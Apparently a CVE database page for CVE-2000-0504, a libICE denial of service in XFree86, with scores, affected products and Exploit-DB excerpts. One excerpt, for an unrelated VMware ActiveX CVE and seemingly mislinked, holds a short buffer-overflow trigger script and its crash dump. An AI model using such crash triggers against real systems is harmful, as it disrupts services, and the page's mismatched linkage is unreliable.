CVE-2000-0504
published 2000-06-19CVE-2000-0504: libICE in XFree86 allows remote attackers to cause a denial of service by specifying a large value which is not properly checked by the SKIP_STRING macro.
PriorityP415medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.28%
86.9th percentile
libICE in XFree86 allows remote attackers to cause a denial of service by specifying a large value which is not properly checked by the SKIP_STRING macro.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gnome | gdm | — | — |
| gnome | gdm | — | — |
| open_group | x | — | — |
| open_group | x | — | — |
| open_group | x | — | — |
| open_group | x | — | — |
| open_group | x | — | — |
| open_group | x | — | — |
| xfree86_project | x11r6 | — | — |
| xfree86_project | x11r6 | — | — |
| xfree86_project | x11r6 | — | — |
| xfree86_project | x11r6 | — | — |
| xfree86_project | x11r6 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
exploitdb·2008-09-01
CVE-2008-3892 VMware - COM API ActiveX Remote Buffer Overflow (PoC)
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
---
VMWare COM API Buffer Overflow
url: http://www.vmware.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
Sub tryMe
buff_1 = String (2000, "a")
buff_2 = String (2000, "b")
test.GuestInfo (buff_1) = buff_2
End Sub
Dump:
09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [00000070])
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ??
Exploit-DB
Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service
exploitdb·2000-06-19
CVE-2000-0504 Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service
Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service
---
// source: https://www.securityfocus.com/bid/1369/info
A denial of service vulnerability exists in libICE, part of the X11 windowing system. Any libICE application which creates inet listening sockets can be remotely crashed. This is due to a bug in the handling of the SKIP_STRING macro. By supplying a large value for the skip value, it is possible to cause a pointer to point to uninitialized memory. This in turn will cause a segfault.
This vulnerability will affect any application using TCP listening sockets in libICE. However, one more widespread use of libICE in this configuration is in the gnome-session program, part of the GNOME package. It is possible to cause the X session of a user to end by performi
No writeups or analysis indexed.
2000-06-19
Published